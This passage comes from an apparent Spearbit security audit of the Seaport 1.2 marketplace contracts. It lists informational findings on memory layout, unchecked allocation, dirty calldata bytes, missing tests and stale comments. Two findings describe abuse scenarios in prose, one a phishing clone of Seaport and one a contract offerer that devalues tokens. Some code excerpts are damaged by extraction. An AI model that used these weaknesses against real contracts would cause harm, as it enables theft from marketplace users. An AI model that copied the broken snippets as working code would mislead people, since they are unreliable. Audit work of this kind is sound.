Context: • OrderFulfiller.sol#L117 • OrderFulfiller.sol#L98
Description: The zone interface was changed from isValidOrderIncludingExtraData to a generic validateOrder; this does not give zones access to the criteria resolvers. Moreover, there is a subtlety introduced by moving the restricted order check from inside _validateOrderAndUpdateStatus to post-execution: any criteria-based order information will have been resolved and replaced by _applyCriteriaResolvers, so zones do not get access to the original order. Any zones that have specialized checks based on criteria items will have issues upgrading to work with Seaport 1.2.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.9 Missing test case for criteria-based contract orders and the identifierOrCriteria != 0 case
Severity: Informational
Context: advanced.spec.ts#L434
Description: The only test case for criteria-based contract orders is in advanced.spec.ts#L434. It covers the case identifierOrCriteria == 0; tests for the other case, identifierOrCriteria != 0, are missing.
Recommendation: Write tests for criteria-based contract orders with identifierOrCriteria != 0, where a Merkle proof for the criteria needs to be provided. Also see "Empty criteriaResolvers for criteria-based contract orders".
Seaport: Fixed in PR 847 and commit c4da5e5.
Spearbit: Verified.

+5.4.10 NatSpec comment for conduitKey in bulkTransfer() says "optional" instead of "mandatory"
Severity: Informational
Context: • TransferHelper.sol#L65 • TransferHelper.sol#L75-L77
Description: The NatSpec comment says that conduitKey is optional, but there is a check making sure that this value is always supplied.
Recommendation:

    * File: TransferHelper.sol
    - 65:     * @param conduitKey An optional conduit key referring to a conduit through
    + 65:     * @param conduitKey A mandatory conduit key referring to a conduit through
      66:     *                   which the bulk transfer should occur.
      ...
      74:     // Ensure that a conduit key has been supplied.
      75:     if (conduitKey == bytes32(0)) {
      76:         revert InvalidConduit(conduitKey, address(0));
      77:     }

Seaport: Fixed in PR 819.
Spearbit: Verified.

+5.4.11 As the _counters are incremented by quasiRandomNumber, it would be hard to sign orders that can only be used when the counter is updated
Severity: Informational
Context: • CounterManager.sol#L46-L50 • CounterManager.sol#L35
Recommendation: As the _counters are incremented by quasiRandomNumber, it would be hard to sign orders that can only be used when the counter is updated, since one can't predict future block hashes:

    let quasiRandomNumber := shr(128, blockhash(sub(number(), 1)))

Seaport: Fixed in PR 837.
Spearbit: Verified.

+5.4.12 Comparing the magic values returned by different contracts is inconsistent
Severity: Informational
Context: • ZoneInteraction.sol#L186 • SignatureVerification.sol#L212
Description: In ZoneInteraction's _callAndCheckStatus we perform the following comparison for the returned magic value:

    let magic := shr(224, mload(callData))
    magicMatch := eq(magic, shr(224, mload(0)))

But the returned magic value comparison in _assertValidSignature is done without truncating the returned value:

    if iszero(eq(mload(0), EIP1271_isValidSignature_selector))

Recommendation: It would be best to have a consistent comparison when checking the magic value. Perhaps checking that the lower bytes are clean, as in _assertValidSignature, would be the better choice.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.13 Document the structure of the TypehashDirectory
Severity: Informational
Context: • TypehashDirectory.sol#L119-L120
Description: Instances of TypehashDirectory act as storage contracts with runtime bytecode:

    [0x00 - 0x00] 00
    [0x01 - 0x20] h(struct BulkOrder { OrderComponents[2] tree })
    [0x21 - 0x40] h(struct BulkOrder { OrderComponents[2][2] tree })
    ...
    [0xNN - 0xMM] h(struct BulkOrder { OrderComponents[2][2]...[2] tree })

h calculates the EIP-712 typeHash of the input struct. 0xMM would be mul(MaxTreeHeight, 0x20), and 0xNN = 0xMM - 0x1f.
Recommendation: Document the above structure.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.14 Document what twoSubstring encodes
Severity: Informational
Context: • TypehashDirectory.sol#L4
Description: We have:

    bytes32 constant twoSubstring = 0x5B325D0000000000000000000000000000000000000000000000000000000000;

which encodes "[2]":

    cast --to-ascii 0x5B325D0000000000000000000000000000000000000000000000000000000000
    [2]

Recommendation: Comment that 0x5B325D0000000000000000000000000000000000000000000000000000000000 encodes [2].
Seaport: Fixed in PR 799.
Spearbit: Verified.
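This can be sanity-checked with a one-line Foundry-style assertion (a hypothetical test; string literals shorter than 32 bytes are right-padded with zeros when converted to bytes32):

    function test_twoSubstring_encodes_bracket2() public {
        // "[2]" = 0x5B 0x32 0x5D, right-padded to 32 bytes.
        assertEq(
            bytes32("[2]"),
            0x5B325D0000000000000000000000000000000000000000000000000000000000
        );
    }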
+5.4.15 Upper bits of the to parameter to call opcodes are stripped out by clients
Severity: Informational
Context: • Executor.sol#L238 • OrderValidator.sol#L374 • SignatureVerification.sol#L196 • TokenTransferrer.sol#L59 • TokenTransferrer.sol#L277 • TokenTransferrer.sol#L418 • TokenTransferrer.sol#L676 • ZoneInteraction.sol#L184
Description: The upper bits of the to parameter to call opcodes are stripped out by clients. For example, geth strips the upper bytes:
• instructions.go#L674
• uint256.go#L114-L121
So even though the to parameters in this context can have dirty upper bits, the call opcodes can still succeed, and masking these values in the contracts is not necessary in this context.
Recommendation: Document this fact.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.16 Remove unused functions
Severity: Informational
Context: • LowLevelHelpers.sol#L25 • LowLevelHelpers.sol#L112 • ZoneInteraction.sol#L227 • PointerLibraries.sol#L3079 • PointerLibraries.sol#L37 • PointerLibraries.sol#L190
Description: The functions in the above context are not used in the codebase.
Recommendation: If you are not planning to use these functions, it would be best to remove them from the codebase.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.17 Fulfillment_itemIndex_offset can be used instead of OneWord
Severity: Informational
Context: • FulfillmentApplier.sol#L392 • FulfillmentApplier.sol#L678
Description: In the above context, one has:

    // Get the item index using the fulfillment pointer.
    itemIndex := mload(add(mload(fulfillmentHeadPtr), OneWord))

Recommendation: Fulfillment_itemIndex_offset is an already-defined named constant with the same value as OneWord (0x20). It would be best to use that constant in this context, since its name is more specific to its usage:

    itemIndex := mload(add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset))

Seaport: Fixed in PR 819.
Spearbit: Verified.

+5.4.18 Document how the _pauser role is assigned for PausableZoneController
Severity: Informational
Context: • PausableZoneController.sol#L123-L131 • PausableZone.sol#L106-L112
Description: The _pauser role is an important role for a PausableZoneController. It can pause any zone created by this controller and thus transfer all the native token funds locked in that zone to itself.
Recommendation: It would be best to document how the _pauser is picked for a controller. Currently, the PausableZoneController used by OpenSea has an owner (a 4/5 GnosisSafe), and the _pauser is also a 2/5 GnosisSafe with the same set of owners.
Seaport: Acknowledged.
Spearbit: Acknowledged.
+5.4.19 _aggregateValidFulfillmentConsiderationItems's memory layout assumptions depend on _validateOrdersAndPrepareToFulfill's memory manipulation
Severity: Informational
Context: • FulfillmentApplier.sol#L621-L625 • FulfillmentApplier.sol#L724-L735 • OrderCombiner.sol#L382-L393
Description: In _aggregateValidFulfillmentConsiderationItems we are using the ReceivedItem.recipient offset to read from considerationItemPtr when writing to receivedItem at that same offset (the same offset is also used here):

    // Set the recipient on the received item.
    mstore(
        add(receivedItem, ReceivedItem_recipient_offset),
        mload(add(considerationItemPtr, ReceivedItem_recipient_offset))
    )

This looks buggy, but in _validateOrdersAndPrepareToFulfill(...) we overwrite consideration[i].endAmount with consideration[i].recipient:

    mstore(
        add(
            considerationItem,
            ReceivedItem_recipient_offset // old endAmount
        ),
        mload(
            add(
                considerationItem,
                ConsiderationItem_recipient_offset
            )
        )
    )

Also, _validateOrdersAndPrepareToFulfill gets called first in both _fulfillAvailableAdvancedOrders and _matchAdvancedOrders. This is important, since the memory for the consideration arrays needs to be updated before we reach _aggregateValidFulfillmentConsiderationItems.
Recommendation: This observation needs to be documented/commented on both _validateOrdersAndPrepareToFulfill and _aggregateValidFulfillmentConsiderationItems, to emphasize their dependency on memory layout.
Seaport: Fixed in PR 868.
Spearbit: Verified.

+5.4.20 recipient is provided as the fulfiller for the OrderFulfilled event
Severity: Informational
Context: • OrderCombiner.sol#L460 • OrderFulfiller.sol#L12 • OrderFulfiller.sol#L361
Description: In the above context, it is in general not true that the recipient is the fulfiller. Note also that recipient is address(0) for match orders.
Recommendation: Either the correct parameter needs to be provided to _emitOrderFulfilledEvent, or the parameter name and comments need to be updated.
Seaport: Fixed in commit 119b1e4.
Spearbit: Verified.

+5.4.21 availableOrders[i] return values need to be explicitly assigned since they live in a region of memory that might have been dirtied before
Severity: Informational
Context: • OrderCombiner.sol#L728
Description: Seaport 1.1 did not have the following default assignment:

    if (advancedOrder.numerator == 0) {
        availableOrders[i] = false;
        continue;
    }

But it is needed here, since the current memory region, which was previously used by the accumulator, might be dirty.
Recommendation: Add a comment to emphasize the above point.
Seaport: Fixed in PR 855.
Spearbit: Verified.

+5.4.22 Usage of MemoryPointer / formatting inconsistent in _getGeneratedOrder
Severity: Informational
Context: • OrderValidator.sol#L451-L465 • OrderValidator.sol#L416-L427
Description: Usage of MemoryPointer / formatting is inconsistent between the loop used for OfferItems and the loop used for ConsiderationItems.
Recommendation: It would be best to have more unified formatting between these two loops.
Seaport: Fixed in PR 824.
Spearbit: Verified.

+5.4.23 newAmount is not used in _compareItems
Severity: Informational
Context: • OrderValidator.sol#L319
Description: newAmount is unused in _compareItems. If originalItem points to I = (t, T, i, a_s, a_e) and newItem points to I' = (t', T', i', a'_s, a'_e), where

parameter   | description
t           | itemType
t'          | itemType of I' after the adjustment for restricted collection items
T, T'       | token
i           | identifierOrCriteria
i'          | identifierOrCriteria of I' after the adjustment for restricted collection items
a_s, a'_s   | startAmount
a_e, a'_e   | endAmount
c           | _compareItems

then we have:

    c(I, I') = (t ≠ t') ∨ (T ≠ T') ∨ (i ≠ i') ∨ (a_s ≠ a_e)

and so we are comparing neither a_s to a'_s nor a'_s to a'_e. In abi_decode_generateOrder_returndata, a'_s = a'_e is enforced. In _getGeneratedOrder, in each loop the following check is or-ed into the errorBuffer:

    (t ≠ t') ∨ (T ≠ T') ∨ (i ≠ i') ∨ (a_s ≠ a_e) ∨ (a_s > a'_s)

where a_s > a'_s is the invalid case for offer items that contributes to the errorBuffer (the inequality is reversed for consideration items).
Recommendation: If newAmount is not planned to be used in _compareItems, it can be removed. Document the other constraints, mentioned above, on the data returned by the contract offerer.
Seaport: Acknowledged.
Spearbit: Acknowledged.
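For illustration, the predicate c written as a plain-Solidity expression (a hypothetical helper; the actual _compareItems is implemented in assembly):

    // Returns true on mismatch. Note that the last clause compares the
    // original item's startAmount to its own endAmount, not to the new
    // item's amounts, which is exactly the gap described above.
    function compareItems(
        uint8 t, address T, uint256 i, uint256 aStart, uint256 aEnd,
        uint8 tNew, address TNew, uint256 iNew
    ) pure returns (bool mismatch) {
        mismatch = t != tNew || T != TNew || i != iNew || aStart != aEnd;
    }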
+5.4.24 Reformat validate so that its body is consistent with the other external functions
Severity: Informational
Context: • Consideration.sol#L488
Description / Recommendation: For consistency with other functions, we can rewrite validate as:

    function validate(
        Order[] calldata /* orders */
    ) external override returns (bool /* validated */) {
        return
            _validate(
                to_dyn_array_Order_ReturnType(abi_decode_dyn_array_Order)(
                    CalldataStart.pptr()
                )
            );
    }

Whether this changes code size or gas cost needs to be checked.
Seaport: Fixed in PR 824.
Spearbit: Verified.

+5.4.25 Add commented parameter names (Type Location /* name */)
Severity: Informational
Context: • Consideration.sol#L489
Description / Recommendation: Add commented parameter names (Type Location /* name */) for validate:

    Order[] calldata /* orders */

Seaport: Fixed in commit 74de34.
Spearbit: Verified.

+5.4.26 Document that the height provided to _lookupBulkOrderTypehash can only be in a certain range
Severity: Informational
Context: • ConsiderationBase.sol#L270
Description: The height h provided to _lookupBulkOrderTypehash needs to satisfy:

    1 + 32(h − 1) ∈ [0, min(0xffffffffffffffff, typeDirectory.codesize) − 32]

Otherwise typeHash := mload(0) would be 0 or would be padded with zeros. When extcodecopy(directory, 0, typeHashOffset, 0x20) gets executed, clients like geth clamp typeHashOffset to the minimum of 0xffffffff_ffffffff and directory.codesize, and pad the result with 0s if out of range. ref:
• instructions.go#L373
• common.go#L54
Recommendation: Comment on the above limitations/constraints in the code base for _lookupBulkOrderTypehash.
Seaport: Acknowledged.
Spearbit: Acknowledged.
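For illustration, the safe range can be expressed as a small hypothetical helper, assuming the geth-style clamping described above:

    // True when the 32-byte extcodecopy read for height `h` stays fully
    // inside the directory's runtime code (entries start at offset 1).
    function isSafeHeight(uint256 h, uint256 directoryCodeSize) pure returns (bool) {
        if (h == 0) return false;
        uint256 typeHashOffset = 1 + 32 * (h - 1);
        // Clients clamp the offset to min(2**64 - 1, codesize) and
        // zero-pad out-of-range reads.
        uint256 bound = directoryCodeSize < type(uint64).max
            ? directoryCodeSize
            : type(uint64).max;
        return typeHashOffset + 32 <= bound;
    }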
[memberTailN : memberTail1 + ) element1 : memberTailN + ) elementN The difference is solc decodes and validates (checking dirty bytes) each field of the elements of the array (which are static struct types) separately (one calldataload and validation per field per element). ConsiderationDecoder skips all those validations for both OfferItems[] and ConsiderationItems[] by copying a chunk of calldata to memory (the tail parts): calldatacopy( mPtrTail, add(cdPtrLength, 0x20), mul(arrLength, OfferItem_size) ) That means for OfferItem[], itemType and token (and also recipient for ConsiderationItem[]) fields can potentially have dirty bytes. Recommendation: Document that struct field validations are skipped and calldata is copied to memory in chunks. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.30 PointerLibraries's malloc skips some checks Severity: Informational Context: • PointerLibraries.sol#L26-L31 Description: malloc in PointerLibraries skips checking if add(mPtr, size) is OOR or wraps around. Solidity does the following when allocating memory: 64 function allocate_memory(size) -> memPtr { memPtr := allocate_unbounded() finalize_allocation(memPtr, size) } function allocate_unbounded() -> memPtr { memPtr := mload() } function finalize_allocation(memPtr, size) { let newFreePtr := add(memPtr, round_up_to_mul_of_32(size)) // protect against overflow if or(gt(newFreePtr, 0xffffffff_ffffffff), lt(newFreePtr, memPtr)) { // <-- the check that is skipped panic_error_() } mstore(, newFreePtr) } function round_up_to_mul_of_32(value) -> result { result := and(add(value, 31), not(31)) } function panic_error_() { // = cast sig "Panic(uint256)" mstore(0, ) mstore(4, ) revert(0, 0x24) } Also note, rounding up the size to the nearest word boundary is hoisted out of malloc. Recommendation: The above needs to be documented, especially if this file gets used by other projects. As Seaport enforces bounds on size outside this library file. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.31 abi_decode_bytes can populate memory with dirty bytes Severity: Informational Context: • ConsiderationDecoder.sol#L60 Description: When abi_decode_bytes decodes bytes, it rounds its size and copies the rounded size from calldata to memory. This memory region might get populated with dirty bytes. So for example: For both signature and extraData we are using abi_decode_bytes. If the AdvancedOrder is tightly packed and: • If signature's length is not a multiple of a word (0x20) part of the extraData.length bytes will be copied/duplicated to the end of signature's last memory slot. • If extraData's length is not a multiple of a word (0x20) part of the calldata that comes after extraData's tail will be copied to memory. Even if AdvancedOrder is not tightly packed (tail offsets are multiple of a word relative to the head), the user can stuff the calldata with dirty bits when signature's or extraData's length is not a multiple of a word. And those dirty bits will be carried over to memory during decoding. Note, these extra bits will not be overridden or 65 cleaned during the decoding because of the way we use and update the free memory pointer (incremented by the rounded-up number to a multiple of a word). Recommendation: Care needs to be taken when using the copied memory region if the size gets rounded to a greater number to make sure the dirty bytes don't get used. Seaport: Acknowledged. Spearbit: Acknowledged. 
+5.4.32 abi_encode_validateOrder reuses a memory region Severity: Informational Context: • ConsiderationEncoder.sol#L361-L364 Description: It is really important to note that before abi_encode_validateOrder is called, _prepareBasicFul- fillmentFromCalldata(...) needs to be called to populate the memory region that is used for event OrderFul- filled(...) which can be reused/copied in this function: MemoryPointer.wrap(offerDataOffset).copy( dstHead.offset(tailOffset), offerAndConsiderationSize ); From when the memory region for OrderFulfilled(...) is populated till we reach this point, care needs to be taken to not modified that region. accumulator data is written to the memory after that region and the current implementation does not touch that region during the whole call after the event has been emitted. Recommendation: It is important to document this reuse of memory region and dependence of abi_encode_- validateOrder and _prepareBasicFulfillmentFromCalldata(...). Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.33 abi_encode_validateOrder writes to a memory region that might have been potentially dirtied by accumulator Severity: Informational Context: • ConsiderationEncoder.sol#L210 Description: In abi_encode_validateOrder potentially (in the future), we might be writing in an area where accumulator was used. And since the book-keeping for the accumulator does not update the free memory pointer, we need to make sure all bytes in the memory in the range [dst, dst+size) are fully updated/written to in this function. Recommendation: Leave note and document the above. Seaport: Fixed in PR 866. Spearbit: Verified. 66 +5.4.34 Reorder writing to memory in ConsiderationEncoder to follow the order in struct definitions. Severity: Informational Context: • ConsiderationEncoder.sol#L334-L335 Description: Reorder the memory writes in ConsiderationEncoder to follow the order in struct definitions. Recommendation: Change the order of dstHead.offset(ZoneParameters_offerer_offset).write(parameters.offerer); dstHead.offset(ZoneParameters_fulfiller_offset).write(msg.sender); to dstHead.offset(ZoneParameters_fulfiller_offset).write(msg.sender); dstHead.offset(ZoneParameters_offerer_offset).write(parameters.offerer); Seaport: Fixed in PR 830. Spearbit: Verified. +5.4.35 The compiled YUL code includes redundant consecutive validation of enum types Severity: Informational Description: Half the location where an enum type struct field has been used/accessed, the validation function for this enum type is performed twice: validator_assert_enum_(memPtr) validator_assert_enum_(memPtr) Recommendation: This is possibly a compiler bug. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.36 Consider writing tests for revert functions in ConsiderationErrors Severity: Informational Context: ConsiderationErrors.sol Description: ConsiderationErrors.sol is a new file and is untested. Writing test cases to make sure the revert functions are throwing the right errors is an easy way to prevent mistakes. Recommendation: Consider adding the following foundry test file: ConsiderationErrorsTest.t.sol // SPDX-License-Identifier: MIT pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "../../contracts/lib/ConsiderationErrors.sol"; import { ConsiderationEventsAndErrors } from ,! 
"../../contracts/interfaces/ConsiderationEventsAndErrors.sol"; import { ReentrancyErrors } from "../../contracts/interfaces/ReentrancyErrors.sol"; import { CriteriaResolutionErrors } from "../../contracts/interfaces/CriteriaResolutionErrors.sol"; 67 import { TokenTransferrerErrors } from "../../contracts/interfaces/TokenTransferrerErrors.sol"; import { ZoneInteractionErrors } from "../../contracts/interfaces/ZoneInteractionErrors.sol"; import { FulfillmentApplicationErrors } from ,! "../../contracts/interfaces/FulfillmentApplicationErrors.sol"; contract ConsiderationErrorsTests is Test { function test__revertInsufficientEtherSupplied() public { vm.expectRevert(ConsiderationEventsAndErrors.InsufficientEtherSupplied.selector); _revertInsufficientEtherSupplied(); } function test__revertOrderAlreadyFilled(bytes32 orderHash) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.OrderAlreadyFilled.selector, orderHash)); _revertOrderAlreadyFilled(orderHash); } function test__revertBadFraction() public { vm.expectRevert(ConsiderationEventsAndErrors.BadFraction.selector); _revertBadFraction(); } function test__revertConsiderationNotMet(uint256 i, uint256 j, uint256 unmetAmount) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.ConsiderationNotMet.selector, i, j, unmetAmount)); _revertConsiderationNotMet(i, j, unmetAmount); } function test__revertInvalidBasicOrderParameterEncoding() public { vm.expectRevert(ConsiderationEventsAndErrors.InvalidBasicOrderParameterEncoding.selector); _revertInvalidBasicOrderParameterEncoding(); } function test__revertInvalidCallToConduit(address conduit) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidCallToConduit.selector, conduit)); _revertInvalidCallToConduit(conduit); } function test__revertInvalidCanceller() public { vm.expectRevert(ConsiderationEventsAndErrors.InvalidCanceller.selector); _revertInvalidCanceller(); } function test__revertInvalidConduit(bytes32 conduitKey, address conduit) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidConduit.selector, ,! conduitKey, conduit)); _revertInvalidConduit(conduitKey, conduit); } function test__revertInvalidMsgValue(uint256 value) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidMsgValue.selector, ,! value)); _revertInvalidMsgValue(value); } 68 function test__revertInvalidNativeOfferItem() public { vm.expectRevert(ConsiderationEventsAndErrors.InvalidNativeOfferItem.selector); _revertInvalidNativeOfferItem(); } function test__revertInvalidTime(uint256 startTime, uint256 endTime) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidTime.selector, ,! startTime, endTime)); _revertInvalidTime(startTime, endTime); } function test__revertMissingOriginalConsiderationItems() public { vm.expectRevert(ConsiderationEventsAndErrors.MissingOriginalConsiderationItems.selector); _revertMissingOriginalConsiderationItems(); } function test__revertNoSpecifiedOrdersAvailable() public { vm.expectRevert(ConsiderationEventsAndErrors.NoSpecifiedOrdersAvailable.selector); _revertNoSpecifiedOrdersAvailable(); } function test__revertOrderIsCancelled(bytes32 orderHash) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.OrderIsCancelled.selector, ,! orderHash)); _revertOrderIsCancelled(orderHash); } function test__revertOrderPartiallyFilled(bytes32 orderHash) public { ,! ,! 
vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.OrderPartiallyFilled.selector, orderHash)); _revertOrderPartiallyFilled(orderHash); } function test__revertPartialFillsNotEnabledForOrder() public { vm.expectRevert(ConsiderationEventsAndErrors.PartialFillsNotEnabledForOrder.selector); _revertPartialFillsNotEnabledForOrder(); } function test__revertConsiderationLengthExceedsTotalOriginal() public { vm.expectRevert(ConsiderationEventsAndErrors.ConsiderationLengthExceedsTotalOriginal.selector); _revertConsiderationLengthExceedsTotalOriginal(); } function test__revertNoReentrantCalls() public { vm.expectRevert(ReentrancyErrors.NoReentrantCalls.selector); _revertNoReentrantCalls(); } function test__revertCriteriaNotEnabledForItem() public { vm.expectRevert(CriteriaResolutionErrors.CriteriaNotEnabledForItem.selector); _revertCriteriaNotEnabledForItem(); } function test__revertUnresolvedConsiderationCriteria(uint256 i, uint256 j) public { vm.expectRevert(abi.encodeWithSelector(CriteriaResolutionErrors.UnresolvedConsiderationCriteria ,! ,! .selector, i, j)); _revertUnresolvedConsiderationCriteria(i, j); } function test__revertUnresolvedOfferCriteria(uint256 i, uint256 j) public { c 69 ,! ,! vm.expectRevert(abi.encodeWithSelector(CriteriaResolutionErrors.UnresolvedOfferCriteria.selector, i, j)); _revertUnresolvedOfferCriteria(i, j); } function test__revertOrderCriteriaResolverOutOfRange() public { vm.expectRevert(abi.encodeWithSelector(CriteriaResolutionErrors.OrderCriteriaResolverOutOfRange ,! ,! .selector, Side.CONSIDERATION)); _revertOrderCriteriaResolverOutOfRange(Side.CONSIDERATION); } function test__revertInvalidProof() public { vm.expectRevert(CriteriaResolutionErrors.InvalidProof.selector); _revertInvalidProof(); } function test__revertUnusedItemParameters() public { vm.expectRevert(TokenTransferrerErrors.UnusedItemParameters.selector); _revertUnusedItemParameters(); } function test__revertInvalidERC721TransferAmount(uint256 amount) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(TokenTransferrerErrors.InvalidERC721TransferAmount.selector, amount)); _revertInvalidERC721TransferAmount(amount); } function test__revertInvalidRestrictedOrder(bytes32 orderHash) public { vm.expectRevert(abi.encodeWithSelector(ZoneInteractionErrors.InvalidRestrictedOrder.selector, ,! orderHash)); _revertInvalidRestrictedOrder(orderHash); } function test__revertInvalidContractOrder(bytes32 orderHash) public { vm.expectRevert(abi.encodeWithSelector(ZoneInteractionErrors.InvalidContractOrder.selector, ,! orderHash)); _revertInvalidContractOrder(orderHash); } ,! ,! ,! function test__revertMismatchedFulfillmentOfferAndConsiderationComponents(uint256 fulfillmentIndex) public { vm.expectRevert(abi.encodeWithSelector(FulfillmentApplicationErrors.MismatchedFulfillmentOfferA ndConsiderationComponents.selector, fulfillmentIndex)); _revertMismatchedFulfillmentOfferAndConsiderationComponents(fulfillmentIndex); } function test__revertMissingFulfillmentComponentOnAggregation() public { vm.expectRevert(abi.encodeWithSelector(FulfillmentApplicationErrors.MissingFulfillmentComponent ,! ,! OnAggregation.selector, Side.OFFER)); _revertMissingFulfillmentComponentOnAggregation(Side.OFFER); } function test__revertOfferAndConsiderationRequiredOnFulfillment() public { ,! vm.expectRevert(FulfillmentApplicationErrors.OfferAndConsiderationRequiredOnFulfillment.selector); _revertOfferAndConsiderationRequiredOnFulfillment(); } 70 c c c } Seaport: Fixed in PR 867. Spearbit: Verified. 
+5.4.37 Typo in comment for the selector used in ConsiderationEncoder.sol#abi_encode_validateOrder()
Severity: Informational
Context: ConsiderationEncoder.sol#L221, ConsiderationEncoder.sol#L321
Description: Minor typo in comments:

    // Write ratifyOrder selector and get pointer to start of calldata
    dst.write(validateOrder_selector);

Recommendation:

    - // Write ratifyOrder selector and get pointer to start of calldata
    + // Write validateOrder selector and get pointer to start of calldata
      dst.write(validateOrder_selector);

Seaport: Fixed in PR 831.
Spearbit: Verified.

+5.4.38 _contractNonces[offerer] gets incremented even if the generateOrder(...) return data does not satisfy all the constraints
Severity: Informational
Context: • OrderValidator.sol#L382 • OrderValidator.sol#L402-L404 • ConsiderationEncoder.sol#L144-L147
Description: _contractNonces[offerer] gets incremented even if the generateOrder(...) return data does not satisfy all the constraints. This is the case when errorBuffer != 0 and revertOnInvalid == false (fulfillAvailableOrders, fulfillAvailableAdvancedOrders). In this case, Seaport would not call back into the contract offerer's ratifyOrder(...) endpoint. Thus, the next time this offerer receives a ratifyOrder(...) call from Seaport, the nonce shared with it might have incremented by more than 1 (see the sketch below).
Recommendation: The above scenario should be documented so that the contract offerer is aware of this fact.
Seaport: Fixed in PR 865.
Spearbit: Verified.
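For illustration, a hypothetical sketch of the bookkeeping a contract offerer could add to tolerate such gaps (simplified; not part of Seaport or its interfaces):

    contract OffererNonceTracker {
        event NonceGapObserved(uint256 previous, uint256 current);

        uint256 public lastSeenNonce;

        // Called from the offerer's ratifyOrder implementation with the
        // contractNonce value Seaport passes in.
        function _recordNonce(uint256 contractNonce) internal {
            // The gap can exceed 1: Seaport increments _contractNonces[offerer]
            // in generateOrder even when the generated order is later skipped
            // (errorBuffer != 0 with revertOnInvalid == false), and skipped
            // orders never receive a ratifyOrder callback.
            if (contractNonce > lastSeenNonce + 1) {
                emit NonceGapObserved(lastSeenNonce, contractNonce);
            }
            lastSeenNonce = contractNonce;
        }
    }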
OpenSea can monitor the chains to label contracts that resemble its code base but have some modifications or monitor calls that have been delegated to Seaport. OpenSea also should monitor all the conduits (and their open channels) that have been created using its corresponding controller. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.40 ZoneInteraction contains logic for both zone and contract offerers Severity: Informational Context: • ZoneInteraction.sol#L34-L39 Description: ZoneInteraction contains logic for both zone and contract offerers. Recommendation: Perhaps the contract/file name can be changed to reflect that its functionality is not only restricted to zone's. Also the contract level NatSpec can be updated. Seaport: Acknowledged. Spearbit: Acknowledged. 72 +5.4.41 Orders of CONTRACT order type can lower the value of a token offered Severity: Informational Context: • ContractOffererInterface.sol#L7-L12 • ContractOffererInterface.sol#L16-L22 Description: Sometimes tokens have extra value because of the derived tokens owned by them (for example an accessory for a player in a game). With the introduction of contract offerer, one can create a contract offerer that automatically lowers the value of a token, for example, by transferring the derived connected token to a different item when Seaport calls the generateOrder(...). When such an order is included in a collection of orders the only way to ensure that the recipient of the item will hold a token which value hasn't depreciated during the transaction is that the recipient would also need to use a kind of mirrored order that incorporates either a CONTRACT or restricted order type that can do a post-transfer check. Recommendation: Document scenarios like the above for the users so that they can interact with Seaport with the above knowledge in mind. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.42 Restricted order checks in case where offerer and the fulfiller are the same Severity: Informational Context: ZoneInteraction.sol#L61 Description: Seaport 1.2 disallowed skipping restricted order checks when offerrer and fulfiller are the same. • Remove special-casing for offerer-fulfilled restricted orders: Offerers may currently bypass restricted order checks when fulfilling their own orders. This complicates reasoning about restricted order validation, can aid in the deception of other offerers or fulfillers in some unusual edge cases, and serves little practical use. However, in the case of the offerer == fulfiller == zone, the check continues to be skipped. Recommendation: Document this edge case. Seaport: Fixed in PR 854. Spearbit: Verified. +5.4.43 Clean up inline documentation Severity: Informational Context: • ConsiderationEncoder.sol#L216, ConsiderationEncoder.sol#L316, ZoneInteraction.sol#L97-L100, ZoneInteraction.sol#L182 • ConsiderationStructs.sol#L167, ZoneInteraction.sol#L78-L83, ZoneInteraction.sol#L45-L49 • TransferHelperErrors.sol#L29, TransferHelperErrors.sol#L40 • Consideration.sol#L39 Description: The comments highlighted in Context need to be removed or updated. 
• Remove the following: 73 ConsiderationEncoder.sol:216: // @todo Dedupe some of this ConsiderationEncoder.sol:316: // @todo Dedupe some of this ZoneInteraction.sol:97: // bytes memory callData; ZoneInteraction.sol:100: // function(bytes32) internal view errorHandler; ZoneInteraction.sol:182: // let magicValue := shr(224, mload(callData)) • ConsiderationStructs.sol#L167 and ZoneInteraction.sol#L82 contain an outdated comment about the extraData attribute. There is no longer a staticcall being done, and the function isValidOrderIn- cludingExtraData no longer exists. – The NatSpec comment for _assertRestrictedAdvancedOrderValidity mentions: /** * @dev Internal view function to determine whether an order is a restricted * * * * * order and, if so, to ensure that it was either submitted by the offerer or the zone for the order, or that the zone returns the expected magic value upon performing a staticcall to `isValidOrder` or `isValidOrderIncludingExtraData` depending on whether the order fulfillment specifies extra data or criteria resolvers. A few of the facts are not correct anymore: * This function is not a view function anymore and change the storage state either for a zone or a contract offerer. * It is not only for restricted orders but also applies to orders of CONTRACT order type. * It performs actuall calls and not staticcalls anymore. * it calls the isValidOrder endpoint of a zone or the ratifyOrder endpoint of a contract offerer depending on the order type. * If it is dealing with a restricted order, the check is only skipped if the msg.sender is the zone. Seaport is called by the offerer for a restricted order, the call to the zone is still performed. If – Same comments apply to _assertRestrictedBasicOrderValidity excluding the case when order is of CONTRACT order type. • Typos in TransferHelperErrors.sol - * @dev Revert with an error when a call to a ERC721 receiver reverts with + * @dev Revert with an error when a call to an ERC721 receiver reverts with • The @ NatSpec fields have an extra space in Consideration.sol: * @ The extra space can be removed. Recommendation: Clean up comments. Seaport: Fixed in PR 816. Spearbit: Verified. 74 +5.4.44 Consider writing tests for hard coded constants in ConsiderationConstants.sol Severity: Informational Context: ConsiderationConstants.sol, ConduitConstants.sol Description: There are many hard coded 